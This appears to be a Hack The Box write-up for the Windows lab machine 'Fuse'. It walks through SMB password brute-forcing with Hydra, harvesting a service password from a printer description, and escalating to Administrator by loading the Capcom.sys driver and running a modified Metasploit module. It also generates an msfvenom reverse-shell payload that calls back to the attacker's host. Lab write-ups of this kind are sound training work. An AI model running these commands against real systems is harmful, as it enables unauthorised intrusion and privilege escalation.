/* */
08/03/2021

Hackthebox Fuse Writeup – 10.10.10.193

ENUMERATIONS

PORT     STATE SERVICE
53/tcp   open  domain
80/tcp   open  http
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl

Let’s take a look at the site that runs on port 80.

We have some information about users. But we don’t have a password. For this, let’s create a wordlist from log files. I used the CEWL tool for this.

root@kali:~/htb/boxes/fuse# cat user.txt 
pmerton
tlavel
sthompson
bhult
administrator
bnielson
root@kali:~/htb/boxes/fuse# cewl -w pass.txt fuse.fabricorp.local/papercut/logs/html/index.htm --with-number -v

CeWL 5.4.8 (Inclusion) Robin Wood (robin@digi.ninja) (https://digi.ninja/)
Starting at http://fuse.fabricorp.local/papercut/logs/html/index.htm
Visiting: http://fuse.fabricorp.local/papercut/logs/html/index.htm, got response code 200
Attribute text found:
 
Offsite link, not following: http://www.papercut.com/?printlogger
Visiting: http://fuse.fabricorp.local:80/papercut/logs/html/../../resources/about.htm referred from http://fuse.fabricorp.local/papercut/logs/html/index.htm, got response code 200
Attribute text found:
 Follow PaperCutDev on Twitter 

Let’s try the passwords we created, along with their usernames …

root@kali:~/htb/boxes/fuse# hydra -L user.txt -P pass.txt 10.10.10.193 smb
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-16 16:36:43
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 1014 login tries (l:6/p:169), ~1014 tries per task
[DATA] attacking smb://10.10.10.193:445/

[445][smb] host: 10.10.10.193   login: tlavel   password: Fabricorp01
[STATUS] 359.00 tries/min, 359 tries in 00:01h, 655 to do in 00:02h, 1 active
[445][smb] host: 10.10.10.193   login: bhult   password: Fabricorp01
[STATUS] 360.50 tries/min, 721 tries in 00:02h, 293 to do in 00:01h, 1 active
[445][smb] host: 10.10.10.193   login: bnielson   password: Fabricorp01
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-16 16:39:29

We have three credentials for smb services…
tlavel=Fabricorp01
bhult=Fabricorp01
bnielson=Fabricorp01

root@kali:~/htb/boxes/fuse# smbclient -L 10.10.10.193 -U fabricorp/tlavel
Enter FABRICORP\tlavel's password: 
session setup failed: NT_STATUS_PASSWORD_MUST_CHANGE

all users (with credentials) must be change passwords

Passwords are requested to be changed. We can do this with the “smbpasswd” tool. Kali also comes installed by default.

root@kali:~/htb/boxes/fuse# smbpasswd -r 10.10.10.193 -U bhult
Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user tlavel on 10.10.10.193.
root@kali:~/htb/boxes/fuse# //my new password is "Fabricorp012"//

Now with the password we have changed, the system that we know is the domain,
Let’s try to connect with “rpcclient” which is a very useful tool.

root@kali:~/htb/boxes/fuse# rpcclient -U bhult //10.10.10.193
Enter WORKGROUP\bhult's password: 
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[svc-print] rid:[0x450]
user:[bnielson] rid:[0x451]
user:[sthompson] rid:[0x641]
user:[tlavel] rid:[0x642]
user:[pmerton] rid:[0x643]
user:[svc-scan] rid:[0x645]
user:[bhult] rid:[0x1bbd]
user:[dandrews] rid:[0x1bbe]
user:[mberbatov] rid:[0x1db1]
user:[astein] rid:[0x1db2]
user:[dmuir] rid:[0x1db3]
rpcclient $> enumprinters
	flags:[0x800000]
	name:[\\10.10.10.193\HP-MFT01]
	description:[\\10.10.10.193\HP-MFT01,HP Universal Printing PCL 6,Central (Near IT, scan2docs password: $fab@s3Rv1ce$1)]
	comment:[]

New one more credential.
svc-print:$fab@s3Rv1ce$1
With this username, let’s try to connect to the fuse machine using “evil-winrm“.

root@kali:~/htb/boxes/fuse# evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'
bash: /usr/local/bin/evil-winrm: /usr/bin/ruby2.5: bad interpreter: No such file or directory

“evil-winrm” looks corrupt. we can fix the problem by reinstalling it.

root@kali:~/htb/boxes/fuse# gem install evil-winrm
Fetching gyoku-1.3.1.gem
Fetching logging-2.2.2.gem
Fetching little-plugger-1.1.4.gem
Fetching gssapi-1.3.0.gem
Fetching nori-2.6.0.gem
Fetching httpclient-2.8.3.gem
Fetching rubyntlm-0.6.2.gem
Fetching winrm-2.3.4.gem
Fetching evil-winrm-2.3.gem
Fetching winrm-fs-1.3.4.gem
Successfully installed gssapi-1.3.0
Successfully installed gyoku-1.3.1
Successfully installed httpclient-2.8.3
Successfully installed little-plugger-1.1.4
Successfully installed logging-2.2.2
Successfully installed nori-2.6.0
Successfully installed rubyntlm-0.6.2
Successfully installed winrm-2.3.4
Successfully installed winrm-fs-1.3.4
Happy hacking! :)
Successfully installed evil-winrm-2.3
Parsing documentation for gssapi-1.3.0
Installing ri documentation for gssapi-1.3.0
Parsing documentation for gyoku-1.3.1
Installing ri documentation for gyoku-1.3.1
Parsing documentation for httpclient-2.8.3
Installing ri documentation for httpclient-2.8.3
Parsing documentation for little-plugger-1.1.4
Installing ri documentation for little-plugger-1.1.4
Parsing documentation for logging-2.2.2
Installing ri documentation for logging-2.2.2
Parsing documentation for nori-2.6.0
Installing ri documentation for nori-2.6.0
Parsing documentation for rubyntlm-0.6.2
Installing ri documentation for rubyntlm-0.6.2
Parsing documentation for winrm-2.3.4
Installing ri documentation for winrm-2.3.4
Parsing documentation for winrm-fs-1.3.4
Installing ri documentation for winrm-fs-1.3.4
Parsing documentation for evil-winrm-2.3
Installing ri documentation for evil-winrm-2.3
Done installing documentation for gssapi, gyoku, httpclient, little-plugger, logging, nori, rubyntlm, winrm, winrm-fs, evil-winrm after 3 seconds
10 gems installed
try connect again...

root@kali:~/htb/boxes/fuse# evil-winrm -i 10.10.10.193 -u svc-print -p '$fab@s3Rv1ce$1'

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-print\Documents>
*Evil-WinRM* PS C:\Users\svc-print\Documents> cd ..
*Evil-WinRM* PS C:\Users\svc-print> dir


    Directory: C:\Users\svc-print


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---         6/1/2020   1:45 AM                Desktop
d-r---        6/15/2020   1:59 PM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos


*Evil-WinRM* PS C:\Users\svc-print> cd Desktop
*Evil-WinRM* PS C:\Users\svc-print\Desktop> dir


    Directory: C:\Users\svc-print\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        6/14/2020   2:54 PM             34 user.txt


*Evil-WinRM* PS C:\Users\svc-print\Desktop> type user.txt
071759c7d0fcbd76b0e60fc53be4d9e1
*Evil-WinRM* PS C:\Users\svc-print\Desktop> exit


*Evil-WinRM* PS C:\Users\svc-print\Documents> whoami
fabricorp\svc-print
*Evil-WinRM* PS C:\Users\svc-print\Documents>

We got half of the system. 🙂

*Evil-WinRM* PS C:\Users> dir


    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/26/2020  10:39 PM                Administrator
d-r---       11/20/2016   6:39 PM                Public
d-----        5/30/2020   4:31 PM                sthompson
d-----        5/31/2020   5:08 PM                svc-print


*Evil-WinRM* PS C:\Users> cd sthompson
*Evil-WinRM* PS C:\Users\sthompson> dir
Access to the path 'C:\Users\sthompson' is denied.
At line:1 char:1
+ dir
+ ~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\sthompson:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\sthompson> cd ..
*Evil-WinRM* PS C:\Users> cd Public
*Evil-WinRM* PS C:\Users\Public> dir
Access to the path 'C:\Users\Public' is denied.
At line:1 char:1
+ dir
+ ~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Public:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\Public> cd ..
*Evil-WinRM* PS C:\Users> cd ..
*Evil-WinRM* PS C:\> dir


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        5/29/2020   5:13 PM                Departments
d-----        5/29/2020   5:23 PM                HP Universal Print Driver
d-----        5/29/2020   4:36 PM                inetpub
d-----        5/26/2020   6:08 PM                PerfLogs
d-r---        6/11/2020   1:57 AM                Program Files
d-----        5/29/2020   4:54 PM                Program Files (x86)
d-----         6/1/2020   4:24 AM                test
d-r---        5/31/2020   5:08 PM                Users
d-----        6/14/2020   2:54 PM                Windows
-ar---        6/10/2020   6:22 PM            334 readme.txt


*Evil-WinRM* PS C:\> type readme.txt
// MFT printing format issue

note to HP engineer:

The "test" directory has been created. For repeated tests while diagnosing this issue, the same folder should be used.

This is a production environment and the "solution" should be developed and confirmed working in your testbed

All changes will be reverted every 2 mins.
*Evil-WinRM* PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeLoadDriverPrivilege         Load and unload device drivers Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

I think we have a vulnerability that we can use. I benefited a lot from the article I gave the link. Very well written.
thanks writer… 🙂
I did all my subsequent operations according to this article…

First make meterpreter agent with “msfvenom”...

root@kali:~/htb/boxes/fuse# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=1515 -f psh -o meter.ps1

root@kali:~/htb/boxes/fuse# msfdb run
[+] Starting database

msf5> handler -H 10.10.14.2 -P 1515 -p windows/x64/meterpreter/reverse_tcp
*Evil-WinRM* PS C:\Users\svc-print> upload meter.ps1
Info: Uploading meter.ps1 to C:\Users\svc-print\meter.ps1
                                                    
Data: 4336 bytes of 4336 bytes copied

Info: Upload successful!

start agent for meterpreter... 

*Evil-WinRM* PS C:\Users\svc-print> ./meter.ps1
*Evil-WinRM* PS C:\Users\svc-print> upload eoploaddriver64.exe
Info: Uploading eoploaddriver64.exe to C:\Users\svc-print\eoploaddriver64.exe
                                                         
Data: 15700 bytes of 15700 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print> upload Capcom.sys
Info: Uploading Capcom.sys to C:\Users\svc-print\Capcom.sys

                                                             
Data: 95424 bytes of 95424 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\svc-print> 

Now start capcom services for privileges with “exploit/windows/local/capcom_sys_exec”
“Capcom.sys” Rootkit Reference : https://github.com/FuzzySecurity/Capcom-Rootkit/blob/master/Driver/Capcom.sys

If you don’t want to deal with compiling, you can download and use the releases I created.
https://github.com/umiterkol/EoPLoadDriver/releases

*Evil-WinRM* PS C:\Users\svc-print\Documents> ./eoploaddriver64.exe System\CurrentControlSet\custom C:\Users\svcprint\Documents\Capcom.sys

msf5 > use exploit/windows/local/capcom_sys_exec 
msf5 exploit(windows/local/capcom_sys_exec) > set session 1
session => 1
msf5 exploit(windows/local/capcom_sys_exec) > set LhOST tun0
LhOST => tun0
msf5 exploit(windows/local/capcom_sys_exec) > exploit 

[*] Started reverse TCP handler on 10.10.14.2:4444 
[-] Exploit aborted due to failure: not-vulnerable: Exploit not available on this system.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/capcom_sys_exec) > 

The exploit is useless because the exploit first looks at the weakness of the remote system.
However, there is no weakness in our system, we created this Capcom service. So we have to edit the exploit.

root@kali:~/htb/boxes/fuse# locate capcom_sys_exec
/usr/share/metasploit-framework/data/exploits/capcom_sys_exec
/usr/share/metasploit-framework/data/exploits/capcom_sys_exec/capcom_sys_exec.x64.dll
/usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb
root@kali:~/htb/boxes/fuse# vi /usr/share/metasploit-framework/modules/exploits/windows/local/capcom_sys_exec.rb

The part I marked is disabled by putting a # sign in front of it.

We have edited exploit, we have to reconfigure msfconsole. Let’s first log out for this.

msf5 exploit(windows/local/capcom_sys_exec) > exit
[*] You have active sessions open, to exit anyway type "exit -y"
msf5 exploit(windows/local/capcom_sys_exec) > exit -y

root@kali:~/htb/boxes/fuse# msfdb reinit
[i] Database already started
[+] Dropping databases 'msf'
[+] Dropping databases 'msf_test'
[+] Dropping database user 'msf'
[+] Deleting configuration file /usr/share/metasploit-framework/config/database.yml
[+] Stopping database
[+] Starting database
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema

msfconsole” start again.

root@kali:~/htb/boxes/fuse# msfdb run
[i] Database already started

msf5 > use exploit/windows/local/capcom_sys_exec


msf5 exploit(windows/local/capcom_sys_exec) > 
msf5 exploit(windows/local/capcom_sys_exec) > set lhost tun0
lhost => tun0
msf5 exploit(windows/local/capcom_sys_exec) > exploit 

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Launching notepad to host the exploit...
[+] Process 956 launched.
[*] Reflectively injecting the exploit DLL into 956...
[*] Injecting exploit into 956...
[*] Exploit injected. Injecting payload into 956...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Meterpreter session 5 opened (10.10.14.2:1515 -> 10.10.10.193:53312) at 2020-06-18 13:04:46 +0300

Meterpreter session 5 authority is Administrator of Fuse …

And rooted…

Thank you for reading.

“Please do not forget that the tools written and used here are for EDUCATIONAL PURPOSES ONLY.

Greetings from Turkey…

error: Content is protected !!